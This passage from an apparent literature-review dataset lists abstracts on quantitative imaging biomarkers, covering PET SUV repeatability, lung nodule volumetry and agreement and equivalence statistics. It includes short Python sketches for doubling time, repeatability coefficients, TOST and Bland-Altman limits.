standardized uptake value, and derived TGV and TPV was found to vary among segmentation algorithms. Some differences between 18 F-FDG and 18 F-FLT scans were observed, mainly because of differences in overall image quality. The smaller reproducibility limits for volume-derived image indices were similar to those for SUV max , suggesting that the use of appropriate delineation tools should allow the determination of tumor functional volumes in PET images in a repeatable and reproducible fashion. --- paper_title: Quantitative imaging for evaluation of response to cancer therapy. paper_content: Advances in molecular medicine offer the potential to move cancer therapy beyond traditional cytotoxic treatments to safer and more effective targeted therapies based on molecular characteristics of a patient's tumor. Within this context, the role of quantitative imaging as an in vivo biomarker has received considerable attention as a means to predict and measure the response to therapy.
For example, the ability to predict the response to therapy quantitatively, early in the drug or radiation therapy regimen, would facilitate adaptive therapy trial strategies, that is, strategies that permit alternative treatment regimens in cases where the initial therapy response was ineffective. Similarly, the ability to measure the response to therapy should provide a more robust means for both therapy dose management and correlation of imaging results with other laboratory biomarkers. The latter is required for decision making in the clinical setting. The National Cancer Institute (NCI), in collaboration with the Food and Drug Administration (FDA), has therefore promoted a number of initiatives supporting the role of molecular imaging in drug trials. The major goal of these initiatives is the "qualification" of the proposed molecular imaging protocol(s) that can be incorporated into current or future drug trials submitted to the FDA. Clinical research strategies that will help achieve these goals are described in the published literature [1-5]. --- paper_title: Five-year lung cancer screening experience: CT appearance, growth rate, location, and histologic features of 61 lung cancers. paper_content: PURPOSE: To retrospectively evaluate the computed tomography (CT)-determined size, morphology, location, morphologic change, and growth rate of incidence and prevalence lung cancers detected in high-risk individuals who underwent annual chest CT screening for 5 years, and to evaluate the histologic features and stages of these cancers. MATERIALS AND METHODS: The study was institutional review board approved and HIPAA compliant. Informed consent was waived. CT scans of 61 cancers (24 in men, 37 in women; age range, 53-79 years; mean, 65 years) were retrospectively reviewed for cancer size, morphology, and location. Forty-eight cancers were assessed for morphologic change and volume doubling time (VDT), which was calculated by using a modified Schwartz equation. Histologic sections were retrospectively reviewed. RESULTS: Mean tumor size was 16.4 mm (range, 5.5-52.5 mm). The most common CT morphologic features were as follows: for bronchioloalveolar carcinoma (BAC) (n = 9), ground-glass attenuation (n = 6, 67%) and smooth (n = 3, 33%), irregular (n = 3, 33%), or spiculated (n = 3, 33%) margin; for non-BAC adenocarcinomas (n = 25), semisolid (n = 11, 44%) or solid (n = 12, 48%) attenuation and irregular margin (n = 14, 56%); for squamous cell carcinoma (n = 14), solid attenuation (n = 12, 86%) and irregular margin (n = 10, 71%); for small cell or mixed small and large cell neuroendocrine carcinoma (n = 7), solid attenuation (n = 6, 86%) and irregular margin (n = 5, 71%); for non-small cell carcinoma not otherwise specified (n = 5), solid attenuation (n = 4, 80%) and irregular margin (n = 3, 60%); and for large cell carcinoma (n = 1), solid attenuation and spiculated shape (n = 1, 100%). Attenuation most often (in 12 of 21 cases) increased. Margins most often (in 16 of 20 cases) became more irregular or spiculated. Mean VDT was 518 days. Thirteen of 48 cancers had a VDT longer than 400 days; 11 of these 13 cancers were in women. CONCLUSION: Overdiagnosis, especially in women, may be a substantial concern in lung cancer screening.
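The volume doubling time used in the screening study above can be illustrated with a short calculation; this sketch uses the generic exponential-growth form VDT = dt * ln(2) / ln(V2/V1) and an idealized spherical conversion from diameter, so it should be read as an illustration rather than the paper's exact modified Schwartz equation:

```python
import math

def volume_from_diameter(diameter_mm: float) -> float:
    """Volume of a sphere with the given diameter, in mm^3 (an idealized assumption)."""
    return math.pi * diameter_mm ** 3 / 6.0

def doubling_time(volume1: float, volume2: float, interval_days: float) -> float:
    """Exponential-growth volume doubling time between two measurements:
    VDT = dt * ln(2) / ln(V2 / V1). Returns infinity if the volume is unchanged."""
    if volume2 == volume1:
        return float("inf")
    return interval_days * math.log(2.0) / math.log(volume2 / volume1)

# Example: a nodule growing from 8 mm to 10 mm diameter over 90 days.
v1, v2 = volume_from_diameter(8.0), volume_from_diameter(10.0)
print(round(doubling_time(v1, v2, 90.0), 1))  # roughly 93 days
```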
--- paper_title: Quantitative imaging biomarkers: A review of statistical methods for technical performance assessment paper_content: Technological developments and greater rigor in the quantitative measurement of biological features in medical images have given rise to an increased interest in using quantitative imaging biomarkers to measure changes in these features. Critical to the performance of a quantitative imaging biomarker in preclinical or clinical settings are three primary metrology areas of interest: measurement linearity and bias, repeatability, and the ability to consistently reproduce equivalent results when conditions change, as would be expected in any clinical trial. Unfortunately, performance studies to date differ greatly in designs, analysis method, and metrics used to assess a quantitative imaging biomarker for clinical use. It is therefore difficult or not possible to integrate results from different studies or to use reported results to design studies. The Radiological Society of North America and the Quantitative Imaging Biomarker Alliance with technical, radiological, and statistical experts developed a set of... --- paper_title: Repeatability of 18F-FDG PET in a Multicenter Phase I Study of Patients with Advanced Gastrointestinal Malignancies paper_content: 18F-FDG PET is often used to monitor tumor response in multicenter oncology clinical trials. This study assessed the repeatability of several semiquantitative standardized uptake values (mean SUV [SUVmean], maximum SUV [SUVmax], peak SUV [SUVpeak], and the 3-dimensional isocontour at 70% of the maximum pixel value [SUV70%]) as measured by repeated baseline 18F-FDG PET studies in a multicenter phase I oncology trial. Methods: Double-baseline 18F-FDG PET studies were acquired for 62 sequentially enrolled patients. Tumor metabolic activity was assessed by SUVmean, SUVmax, SUVpeak, and SUV70%. The effect on SUV repeatability of compliance with recommended image-acquisition guidelines and quality assurance (QA) standards was assessed. Summary statistics for absolute differences relative to the average of baseline values and repeatability analysis were performed for all patients and for a subgroup that passed QA, in both a multi- and a single-observer setting. Intrasubject precision of baseline measurements was assessed by repeatability coefficients, intrasubject coefficients of variation (CV), and confidence intervals on mean baseline differences for all SUV parameters. Results: The mean differences between the 2 SUV baseline measurements were small, varying from -2.1% to 1.9%, and the 95% confidence intervals for these mean differences had a maximum half-width of about 5.6% across the SUV parameters assessed. For SUVmax, the intrasubject CV varied from 10.7% to 12.8% for the QA multi- and single-observer datasets and was 16% for the full dataset. The 95% repeatability coefficients ranged from -28.4% to 39.6% for the QA datasets and up to -34.3% to 52.3% for the full dataset. Conclusion: Repeatability results of double-baseline 18F-FDG PET scans were similar for all SUV parameters assessed, for both the full and the QA datasets, in both the multi- and the single-observer settings. Centralized quality assurance and analysis of data improved intrasubject CV from 15.9% to 10.7% for averaged SUVmax. Thresholds for metabolic response in the multicenter multiobserver non-QA settings were -34% and 52% and in the range of -26% to 39% with centralized QA.
These results support the use of 18 F-FDG PET for tumor assessment in multicenter oncology clinical trials. --- paper_title: The Lung Image Database Consortium (LIDC): A comparison of different size metrics for pulmonary nodule measurements paper_content: RATIONALE AND OBJECTIVES ::: The goal was to investigate the effects of choosing between different metrics in estimating the size of pulmonary nodules as a factor both of nodule characterization and of performance of computer aided detection systems, because the latter are always qualified with respect to a given size range of nodules. ::: ::: ::: MATERIALS AND METHODS ::: This study used 265 whole-lung CT scans documented by the Lung Image Database Consortium (LIDC) using their protocol for nodule evaluation. Each inspected lesion was reviewed independently by four experienced radiologists who provided boundary markings for nodules larger than 3 mm. Four size metrics, based on the boundary markings, were considered: a unidimensional and two bidimensional measures on a single image slice and a volumetric measurement based on all the image slices. The radiologist boundaries were processed and those with four markings were analyzed to characterize the interradiologist variation, while those with at least one marking were used to examine the difference between the metrics. ::: ::: ::: RESULTS ::: The processing of the annotations found 127 nodules marked by all of the four radiologists and an extended set of 518 nodules each having at least one observation with three-dimensional sizes ranging from 2.03 to 29.4 mm (average 7.05 mm, median 5.71 mm). A very high interobserver variation was observed for all these metrics: 95% of estimated standard deviations were in the following ranges for the three-dimensional, unidimensional, and two bidimensional size metrics, respectively (in mm): 0.49-1.25, 0.67-2.55, 0.78-2.11, and 0.96-2.69. Also, a very large difference among the metrics was observed: 0.95 probability-coverage region widths for the volume estimation conditional on unidimensional, and the two bidimensional size measurements of 10 mm were 7.32, 7.72, and 6.29 mm, respectively. ::: ::: ::: CONCLUSIONS ::: The selection of data subsets for performance evaluation is highly impacted by the size metric choice. The LIDC plans to include a single size measure for each nodule in its database. This metric is not intended as a gold standard for nodule size; rather, it is intended to facilitate the selection of unique repeatable size limited nodule subsets. 
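The repeatability coefficients and intrasubject coefficients of variation reported in the double-baseline SUV study above follow from the within-subject variability of paired test-retest measurements; a minimal sketch using the standard definitions from this literature (the data and function names are illustrative assumptions):

```python
import numpy as np

def test_retest_metrics(scan1, scan2):
    """Test-retest repeatability summaries from paired baseline measurements of the
    same index (e.g. SUVmax) with no intervening change. Returns the within-subject
    SD, the within-subject coefficient of variation, and the repeatability
    coefficient RC = 1.96*sqrt(2)*wSD (about 2.77*wSD), the bound expected to
    cover 95% of test-retest differences."""
    x, y = np.asarray(scan1, float), np.asarray(scan2, float)
    d = x - y
    m = (x + y) / 2.0
    wsd = np.sqrt(np.mean(d ** 2) / 2.0)        # within-subject standard deviation
    wcv = np.sqrt(np.mean((d / m) ** 2) / 2.0)  # within-subject CV (relative scale)
    rc = 1.96 * np.sqrt(2.0) * wsd              # repeatability coefficient
    return {"wSD": wsd, "wCV": wcv, "RC": rc}

# Hypothetical double-baseline SUVmax values for five lesions.
print(test_retest_metrics([6.1, 4.8, 9.2, 3.5, 7.4], [5.7, 5.2, 8.6, 3.9, 7.9]))
```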
--- paper_title: An Introduction to the Bootstrap paper_content: Introduction. The Accuracy of a Sample Mean. Random Samples and Probabilities. The Empirical Distribution Function and the Plug-In Principle. Standard Errors and Estimated Standard Errors. The Bootstrap Estimate of Standard Error. Bootstrap Standard Errors: Some Examples. More Complicated Data Structures. Regression Models. Estimates of Bias. The Jackknife. Confidence Intervals Based on Bootstrap "Tables". Confidence Intervals Based on Bootstrap Percentiles. Better Bootstrap Confidence Intervals. Permutation Tests. Hypothesis Testing with the Bootstrap. Cross-Validation and Other Estimates of Prediction Error. Adaptive Estimation and Calibration. Assessing the Error in Bootstrap Estimates. A Geometrical Representation for the Bootstrap and Jackknife. An Overview of Nonparametric and Parametric Inference. Further Topics in Bootstrap Confidence Intervals. Efficient Bootstrap Computations. Approximate Likelihoods. Bootstrap Bioequivalence. Discussion and Further Topics. Appendix: Software for Bootstrap Computations. References. --- paper_title: A comparison of the Two One-Sided Tests Procedure and the Power Approach for assessing the equivalence of average bioavailability paper_content: The statistical test of the hypothesis of no difference between the average bioavailabilities of two drug formulations, usually supplemented by an assessment of what the power of the statistical test would have been if the true averages had been inequivalent, continues to be used in the statistical analysis of bioavailability/bioequivalence studies. In the present article, this Power Approach (which in practice usually consists of testing the hypothesis of no difference at level 0.05 and requiring an estimated power of 0.80) is compared to another statistical approach, the Two One-Sided Tests Procedure, which leads to the same conclusion as the approach proposed by Westlake based on the usual (shortest) 1 - 2α confidence interval for the true average difference. It is found that for the specific choice of α = 0.05 as the nominal level of the one-sided tests, the two one-sided tests procedure has uniformly superior properties to the power approach in most cases. The only cases where the power approach has superior properties when the true averages are equivalent correspond to cases where the chance of concluding equivalence with the power approach when the true averages are not equivalent exceeds 0.05. With appropriate choice of the nominal level of significance of the one-sided tests, the two one-sided tests procedure always has uniformly superior properties to the power approach. The two one-sided tests procedure is compared to the procedure proposed by Hauck and Anderson. --- paper_title: Testing Statistical Hypotheses of Equivalence paper_content: Introduction. Methods for One-Sided Equivalence Problems. General Approaches to the Construction of Tests for Equivalence in the Strict Sense. Equivalence Tests for Selected One-Parameter Problems. Equivalence Tests for Designs with Paired Observation. Equivalence Tests for Two Unrelated Samples. Multi-sample Tests for Equivalence. Tests for Establishing Goodness of Fit. The Assessment of Bio-Equivalence. Appendix. References.
Index. --- paper_title: Comparison of thallium-201 SPECT and planar imaging methods for quantification of experimental myocardial infarct size paper_content: To compare single photon emission computed tomography (SPECT) and planar thallium-201 (Tl-201) myocardial perfusion imaging methods for quantification of left ventricular infarct size, 12 dogs with 6 to 8 hours of closed-chest coronary occlusion and 5 normal dogs were studied. After intravenous administration of Tl-201, SPECT and three-view planar images were obtained. After the animals were put to death, hearts were sliced and stained with triphenyltetrazolium chloride (TTC) for planimetric determination of left ventricular infarct size. Infarct size on each SPECT slice and planar image was defined as the percentage of circumferential count profiles falling below the limits derived from normal dogs. Infarct size as a percentage of left ventricular mass was determined from SPECT and planar images before and after correcting for differences in myocardial slice mass from apex to base. The correlation coefficients, the concordance correlation coefficients (reflecting closeness to the line of identity), and the mean absolute deviations of the four methods versus TTC staining were 0.83, 0.77, and 5.1% (SPECT, no correction); 0.85, 0.84, and 3.7% (SPECT with correction); 0.81, 0.42, and 12.9% (planar, no correction); and 0.75, 0.49, and 10.4% (planar with correction). The regression lines did not differ from the line of identity for SPECT, whereas they differed significantly for planar imaging. Thus both SPECT and planar imaging are well suited for quantification of left ventricular infarct size. SPECT, however, appears to be superior to planar imaging, since its regression line more closely approximates the line of identity. --- paper_title: A quantitative comparison of motion detection algorithms in fMRI paper_content: An important step in the analysis of fMRI time-series data is to detect, and as much as possible, correct for subject motion during the course of the scanning session. Several public domain algorithms are currently available for motion detection in fMRI. This paper compares the performance of four commonly used programs: AIR 3.08, SPM99, AFNI98, and the pyramid method of Thevenaz, Ruttimann, and Unser (TRU). The comparison is based on the performance of the algorithms in correcting a range of simulated known motions in the presence of various degrees of noise. SPM99 provided the most accurate motion detection amongst the algorithms studied. AFNI98 provided only slightly less accurate results than SPM99; however, it was several times faster than the other programs. This algorithm represents a good compromise between speed and accuracy. AFNI98 was also the most robust program in the presence of noise. It yielded reasonable results for very low signal-to-noise levels. For small initial misalignments, TRU's performance was similar to SPM99 and AFNI98. However, its accuracy diminished rapidly for larger misalignments. AIR was found to be the least accurate program studied. --- paper_title: Quantitative imaging biomarkers: A review of statistical methods for technical performance assessment paper_content: Technological developments and greater rigor in the quantitative measurement of biological features in medical images have given rise to an increased interest in using quantitative imaging biomarkers to measure changes in these features.
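The two one-sided tests (TOST) procedure discussed in the equivalence-testing entries above can be written in a few lines; this sketch applies it to paired differences on the raw scale with an invented equivalence margin, whereas bioequivalence practice usually works with log-transformed ratios:

```python
import math
from scipy import stats

def tost_paired(diffs, lower=-0.5, upper=0.5, alpha=0.05):
    """Two one-sided tests for equivalence of paired differences. Equivalence is
    declared at level alpha if both one-sided nulls (mean <= lower, mean >= upper)
    are rejected; equivalently, if the (1 - 2*alpha) confidence interval for the
    mean difference lies inside (lower, upper)."""
    n = len(diffs)
    mean = sum(diffs) / n
    sd = math.sqrt(sum((d - mean) ** 2 for d in diffs) / (n - 1))
    se = sd / math.sqrt(n)
    t_lower = (mean - lower) / se  # tests H0: mean <= lower
    t_upper = (mean - upper) / se  # tests H0: mean >= upper
    p_lower = 1.0 - stats.t.cdf(t_lower, df=n - 1)
    p_upper = stats.t.cdf(t_upper, df=n - 1)
    return max(p_lower, p_upper) < alpha

# Example: test-retest differences of some index against an assumed +/-0.5 margin.
print(tost_paired([0.10, -0.05, 0.20, 0.00, -0.15, 0.05, 0.12, -0.08]))
```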
Critical to the performance of a quantitative imaging biomarker in preclinical or clinical settings are three primary metrology areas of interest: measurement linearity and bias, repeatability, and the ability to consistently reproduce equivalent results when conditions change, as would be expected in any clinical trial. Unfortunately, performance studies to date differ greatly in designs, analysis method, and metrics used to assess a quantitative imaging biomarker for clinical use. It is therefore difficult or not possible to integrate results from different studies or to use reported results to design studies. The Radiological Society of North America and the Quantitative Imaging Biomarker Alliance with technical, radiological, and statistical experts developed a set of... --- paper_title: The FDA Critical Path Initiative and Its Influence on New Drug Development paper_content: Societal expectations about drug safety and efficacy are rising while productivity in the pharmaceutical industry is falling. In 2004, the US Food and Drug Administration introduced the Critical Path Initiative with the intent of modernizing drug development by incorporating recent scientific advances, such as genomics and advanced imaging technologies, into the process. An important part of the initiative is the use of public-private partnerships and consortia to accomplish the needed research. This article explicates the reasoning behind the Critical Path Initiative and discusses examples of successful consortia. --- paper_title: Statistical issues in the comparison of quantitative imaging biomarker algorithms using pulmonary nodule volume as an example paper_content: Quantitative imaging biomarkers are being used increasingly in medicine to diagnose and monitor patients’ disease. The computer algorithms that measure quantitative imaging biomarkers have different technical performance characteristics. In this paper we illustrate the appropriate statistical methods for assessing and comparing the bias, precision, and agreement of computer algorithms. We use data from three studies of pulmonary nodules. The first study is a small phantom study used to illustrate metrics for assessing repeatability. The second study is a large phantom study allowing assessment of four algorithms’ bias and reproducibility for measuring tumor volume and the change in tumor volume. The third study is a small clinical study of patients whose tumors were measured on two occasions. This study allows a direct assessment of six algorithms’ performance for measuring tumor change. With these three examples we compare and contrast study designs and performance metrics, and we illustrate the advantag... --- paper_title: Measuring agreement in method comparison studies paper_content: Agreement between two methods of clinical measurement can be quantified using the differences between observations made using the two methods on the same subjects. The 95% limits of agreement, estimated by mean difference +/- 1.96 standard deviation of the differences, provide an interval within which 95% of differences between measurements by the two methods are expected to lie. We describe how graphical methods can be used to investigate the assumptions of the method and we also give confidence intervals. We extend the basic approach to data where there is a relationship between difference and magnitude, both with a simple logarithmic transformation approach and a new, more general, regression approach. 
We discuss the importance of the repeatability of each method separately and compare an estimate of this to the limits of agreement. We extend the limits of agreement approach to data with repeated measurements, proposing new estimates for equal numbers of replicates by each method on each subject, for unequal numbers of replicates, and for replicated data collected in pairs, where the underlying value of the quantity being measured is changing. Finally, we describe a nonparametric approach to comparing methods. --- paper_title: Properties of Sufficiency and Statistical Tests paper_content: 1—In a previous paper*, dealing with the importance of properties of sufficiency in the statistical theory of small samples, attention was mainly confined to the theory of estimation. In the present paper the structure of small sample tests, whether these are related to problems of estimation and fiducial distributions, or are of the nature of tests of goodness of fit, is considered further. --- paper_title: Quantitative imaging biomarkers: A review of statistical methods for technical performance assessment paper_content: Technological developments and greater rigor in the quantitative measurement of biological features in medical images have given rise to an increased interest in using quantitative imaging biomarkers to measure changes in these features. Critical to the performance of a quantitative imaging biomarker in preclinical or clinical settings are three primary metrology areas of interest: measurement linearity and bias, repeatability, and the ability to consistently reproduce equivalent results when conditions change, as would be expected in any clinical trial. Unfortunately, performance studies to date differ greatly in designs, analysis method, and metrics used to assess a quantitative imaging biomarker for clinical use. It is therefore difficult or not possible to integrate results from different studies or to use reported results to design studies. The Radiological Society of North America and the Quantitative Imaging Biomarker Alliance with technical, radiological, and statistical experts developed a set of... --- paper_title: The emerging science of quantitative imaging biomarkers terminology and definitions for scientific studies and regulatory submissions paper_content: The development and implementation of quantitative imaging biomarkers has been hampered by the inconsistent and often incorrect use of terminology related to these markers. Sponsored by the Radiological Society of North America, an interdisciplinary group of radiologists, statisticians, physicists, and other researchers worked to develop a comprehensive terminology to serve as a foundation for quantitative imaging biomarker claims. Where possible, this working group adapted existing definitions derived from national or international standards bodies rather than invent new definitions for these terms. This terminology also serves as a foundation for the design of studies that evaluate the technical performance of quantitative imaging biomarkers and for studies of algorithms that generate the quantitative imaging biomarkers from clinical scans. This paper provides examples of research studies and quantitative imaging biomarker claims that use terminology consistent with these definitions as well as examples... 
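The 95% limits of agreement from the Bland and Altman entry above amount to the mean difference plus or minus 1.96 standard deviations of the differences; a minimal sketch with invented paired data:

```python
import numpy as np

def limits_of_agreement(method_a, method_b):
    """Bland-Altman style summary: the mean difference (bias) and the interval
    bias +/- 1.96*SD of the differences, expected to contain about 95% of the
    differences between the two measurement methods."""
    a, b = np.asarray(method_a, float), np.asarray(method_b, float)
    d = a - b
    bias = d.mean()
    sd = d.std(ddof=1)
    return bias, (bias - 1.96 * sd, bias + 1.96 * sd)

# Hypothetical tumor volumes (mL) from two algorithms on the same ten lesions.
vol_a = [10.2, 5.1, 7.8, 12.4, 3.3, 8.8, 6.0, 9.5, 4.4, 11.1]
vol_b = [9.8, 5.6, 7.2, 12.9, 3.1, 8.1, 6.4, 9.0, 4.9, 10.6]
bias, (lo, hi) = limits_of_agreement(vol_a, vol_b)
print(round(bias, 2), round(lo, 2), round(hi, 2))
```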
--- paper_title: Statistical methods in assessing agreement: Models, issues, and tools paper_content: Measurements of agreement are needed to assess the acceptability of a new or generic process, methodology, and formulation in areas of laboratory performance, instrument or assay validation, method comparisons, statistical process control, goodness of fit, and individual bioequivalence. In all of these areas, one needs measurements that capture a large proportion of data that are within a meaningful boundary from target values. Target values can be considered random (measured with error) or fixed (known), depending on the situation. Various meaningful measures to cope with such diverse and complex situations have become available only in the last decade. These measures often assume that the target values are random. This article reviews the literature and presents methodologies in terms of “coverage probability.” In addition, analytical expressions are introduced for all of the aforementioned measurements when the target values are fixed and when the error structure is homogenous or heterogeneous (proport... --- paper_title: Statistical methods in diagnostic medicine paper_content: Preface. Acknowledgments. 1. Introduction. 1.1 Why This Book? 1.2 What Is Diagnostic Accuracy? 1.3 Landmarks in Statistical Methods for Diagnostic Medicine. 1.4 Software. 1.5 Topics not Covered in This Book. 1.6 Summary. I BASIC CONCEPTS AND METHODS. 2. Measures of Diagnostic Accuracy. 2.1 Sensitivity and Specificity. 2.2 The Combined Measures of Sensitivity and Specificity. 2.3 The ROC Curve. 2.4 The Area Under the ROC Curve. 2.5 The Sensitivity at a Fixed FPR. 2.6 The Partial Area Under the ROC Curve. 2.7 Likelihood Ratios. 2.8 Other ROC Curve Indices. 2.9 The Localization and Detection of Multiple Abnormalities. 2.10 Interpretation of Diagnostic Tests. 2.11 Optimal Decision Threshold on the ROC Curve. 2.12 Multiple Tests. 3. The Design of Diagnostic Accuracy Studies. 3.1 Determining the Objective of the Study. 3.2 Identifying the Target Patient Population. 3.3 Selecting a Sampling Plan for Patients. 3.3.1 Phase I: Exploratory Studies. 3.3.2 Phase II: Challenge Studies. 3.3.3 Phase III: Clinical Studies. 3.4 Selecting the Gold Standard. 3.5 Choosing a Measure of Accuracy. 3.6 Identifying the Target Reader Population. 3.7 Selecting a Sampling Plan for Readers. 3.8 Planning the Data Collection. 3.8.1 Format for the Test Results. 3.8.2 Data Collection for the Reader Studies. 3.8.3 Reader Training. 3.9 Planning the Data Analyses. 3.9.1 Statistical Hypotheses. 3.9.2 Reporting the Test Results. 3.10 Determining the Sample Size. 4. Estimation and Hypothesis Testing in a Single Sample. 4.1 Binary Scale Data. 4.1.1 Sensitivity and Specificity. 4.1.2 The Sensitivity and Specificity of Clustered Binary Data. 4.1.3 The Likelihood Ratio (LR). 4.1.4 The Odds Ratio. 4.2 Ordinal Scale Data. 4.2.1 The Empirical ROC Curve. 4.2.2 Fitting a Smooth Curve (Parametric Model). 4.2.3 Estimation of Sensitivity at a Particular FPR. 4.2.4 The Area and Partial Area Under the ROC Curve (Parametric Model). 4.2.5 The Area Under the Curve (Nonparametric Method). 4.2.6 Nonparametric Analysis of Clustered Data. 4.2.7 The Degenerate Data. 4.2.8 Choosing Between Parametric and Nonparametric Methods. 4.3 Continuous Scale Data. 4.3.1 The Empirical ROC Curve. 4.3.2 Fitting a Smooth ROC Curve (Parametric and Nonparametric Methods). 4.3.3 Area Under the ROC Curve (Parametric and Nonparametric). 4.3.4 Fixed FPR The Sensitivity and Decision Threshold. 
4.3.5 Choosing the Optimal Operating Point. 4.3.6 Choosing Between Parametric and Nonparametric Techniques. 4.4 Hypothesis Testing About the ROC Area. 5. Comparing the Accuracy of Two Diagnostic Tests. 5.1 Binary Scale Data. 5.1.1 Sensitivity and Specificity. 5.1.2 Sensitivity and Specificity of Clustered Binary Data. 5.2 Ordinal and Continuous Scale Data. 5.2.1 Determining the Equality of Two ROC Curves. 5.2.2 Comparing ROC Curves at a Particular Point. 5.2.3 Determining the Range of FPR for Which TPR Differ. 5.2.4 A Comparison of the Area or Partial Area. 5.3 Tests of Equivalence. 6. Sample Size Calculation. 6.1 The Sample Size for Accuracy Studies of a Single Test. 6.1.1 Sensitivity and Specificity. 6.1.2 The Area Under the ROC Curve. 6.1.3 The Sensitivity at a Fixed FPR. 6.1.4 The Partial Area Under the ROC Curve. 6.2 The Sample Size for the Accuracy of Two Tests. 6.2.1 Sensitivity and Specificity. 6.2.2 The Area Under the ROC Curve. 6.2.3 The Sensitivity at a Fixed FPR. 6.2.4 The Partial Area Under the ROC Curve. 6.3 The Sample Size for Equivalent Studies of Two Tests. 6.4 The Sample Size for Determining a Suitable Cutoff Value. 7. Issues in Meta Analysis for Diagnostic Tests. 7.1 Objectives. 7.2 Retrieval of the Literature. 7.3 Inclusion Exclusion Criteria. 7.4 Extracting Information From the Literature. 7.5 Statistical Analysis. 7.6 Public Presentation. II ADVANCED METHODS. 8. Regression Analysis for Independent ROC Data. 8.1 Four Clinical Studies. 8.1.1 Surgical Lesion in a Carotid Vessel Example. 8.1.2 Pancreatic Cancer Exampl. 8.1.3 Adult Obesity Example. 8.1.4 Staging of Prostate Cancer Example. 8.2 Regression Models for Continuous Scale Tests. 8.2.1 Indirect Regression Models for Smooth ROC Curves. 8.2.2 Direct Regression Models for Smooth ROC Curves. 8.2.3 MRA Use for Surgical Lesion Detection in the Carotid Vessel. 8.2.4 Biomarkers for the Detection of Pancreatic Cancer. 8.2.5 Prediction of Adult Obesity by Using Childhood BMI Measurements. 8.3 Regression Models for Ordinal Scale Tests. 8.3.1 Indirect Regression Models for Latent Smooth ROC Curves. 8.3.2 Direct Regression Model for Latent Smooth ROC Curves. 8.3.3 Detection of Periprostatic Invasion With US. 9. Analysis of Correlated ROC Data. 9.1 Studies With Multiple Test Measurements of the Same Patient. 9.1.1 Indirect Regression Models for Ordinal Scale Tests. 9.1.2 Neonatal Examination Example. 9.1.3 Direct Regression Models for Continuous Scale Tests. 9.2 Studies With Multiple Readers and Tests. 9.2.1 A Mixed Effects ANOVA Model for Summary Measures of Diagnostic Accuracy. 9.2.2 Detection of TAD Example. 9.2.3 The Mixed Effects ANOVA Model for Jackknife Pseudovalues. 9.2.4 Neonatal Examination Example. 9.2.5 A Bootstrap Method. 9.3 Sample Size Calculation for Multireader Studies. 10. Methods for Correcting Verification Bias. 10.1 A Single Binary Scale Test. 10.1.1 Correction Methods With the MAR Assumption. 10.1.2 Correction Methods Without the MAR Assumption. 10.1.3 Hepatic Scintigraph Example. 10.2 Correlated Binary Scale Tests. 10.2.1 An ML Approach Without Covariates. 10.2.2 An ML Approach With Covariates. 10.2.3 Screening Tests for Dementia Disorder Example. 10.3 A Single Ordinal Scale Test. 10.3.1 An ML Approach Without Covariates. 10.3.2 Fever of Uncertain Origin Example. 10.3.3 An ML Approach With Covariates. 10.3.4 Screening Test for Dementia Disorder Example. 10.4 Correlated Ordinal Scale Tests. 10.4.1 The Weighted GEE Approach for Latent Smooth ROC Curves. 10.4.2 A Likelihood Based Approach for ROC Areas. 
10.4.3 Use of CT and MRI for Staging Pancreatic Cancer Example. 11. Methods for Correcting Imperfect Standard Bias. 11.1 One Single Test in a Single Population. 11.1.1 Hypothetical and Strongyloides Infection Examples. 11.2 One Single Test in G Populations. 11.2.1 Tuberculosis Example. 11.3 Multiple Tests in One Single Population. 11.3.1 MLEs Under the CIA. 11.3.2 Assessment of Pleural Thickening Example. 11.3.3 ML Approaches Without the CIA. 11.3.4 Bioassays for HIV Example. 11.4 Multiple Binary Tests in G Populations. 11.4.1 ML Approaches Under the CIA. 11.4.2 ML Approaches Without the CIA. 12. Statistical Methods for Meta Analysis. 12.1 Sensitivity and Specificity Pairs. 12.1.1 One Common SROC Curve. 12.1.2 Study Specific SROC Curve. 12.1.3 Evaluation of Duplex Ultrasonography, With and Without Color Guidance. 12.2 ROC Curve Areas. 12.2.1 Fixed Effects Models. 12.2.2 Random Effects Models. 12.2.3 Evaluation of the Dexamethasone Suppression.Test. Index. --- paper_title: Total deviation index for measuring individual agreement with applications in laboratory performance and bioequivalence. paper_content: In areas of inter-laboratory quality control, method comparisons, assay validation and individual bioequivalence, etc., the agreement between observations and target (reference) values is of interest. The mean of the squared difference between observations and target values (MSD) is a good measure of the total deviation. A new user-friendly statistic, the total deviation index (TDI(1-p)), is introduced that translates the MSD into an index that can be directly compared to a predetermined criterion. The TDI(1-p) describes a boundary such that a majority, 100(1-p) per cent, of the observations are within the boundary (measurement unit and/or per cent) from their target values. Statistical inference using the sample counter part (estimate) is presented. A Monte Carlo experiment with 5000 runs was performed to confirm the estimate's validity. Applications in laboratory performance and validation, as well as individual bioequivalence, are presented. --- paper_title: A Collaborative Enterprise for Multi-Stakeholder Participation in the Advancement of Quantitative Imaging paper_content: We have formed the Quantitative Imaging Biomarker Alliance to enable cooperation and address issues in quantitative medical imaging by adapting the successful Integrating the Healthcare Enterprise precedent to the needs of imaging science. --- paper_title: Statistical issues in the comparison of quantitative imaging biomarker algorithms using pulmonary nodule volume as an example paper_content: Quantitative imaging biomarkers are being used increasingly in medicine to diagnose and monitor patients’ disease. The computer algorithms that measure quantitative imaging biomarkers have different technical performance characteristics. In this paper we illustrate the appropriate statistical methods for assessing and comparing the bias, precision, and agreement of computer algorithms. We use data from three studies of pulmonary nodules. The first study is a small phantom study used to illustrate metrics for assessing repeatability. The second study is a large phantom study allowing assessment of four algorithms’ bias and reproducibility for measuring tumor volume and the change in tumor volume. The third study is a small clinical study of patients whose tumors were measured on two occasions. This study allows a direct assessment of six algorithms’ performance for measuring tumor change. 
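For phantom-based performance assessments of the kind described in the entry above, bias and linearity are usually summarized by comparing measurements against the known reference values; a minimal sketch (data, names, and the choice of an ordinary least squares fit as the linearity check are illustrative assumptions, not the cited study's exact metrics):

```python
import numpy as np

def bias_and_linearity(measured, reference):
    """Technical-performance summaries against a known truth: mean bias, mean
    percent bias, and an ordinary least squares slope and intercept of measured
    on reference as a simple linearity check."""
    m, r = np.asarray(measured, float), np.asarray(reference, float)
    bias = np.mean(m - r)
    pct_bias = 100.0 * np.mean((m - r) / r)
    slope, intercept = np.polyfit(r, m, 1)
    return {"bias": bias, "percent_bias": pct_bias, "slope": slope, "intercept": intercept}

# Hypothetical phantom nodule volumes (mm^3): algorithm output vs. known truth.
measured = [520.0, 1015.0, 1980.0, 4150.0, 8230.0]
reference = [500.0, 1000.0, 2000.0, 4000.0, 8000.0]
print(bias_and_linearity(measured, reference))
```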
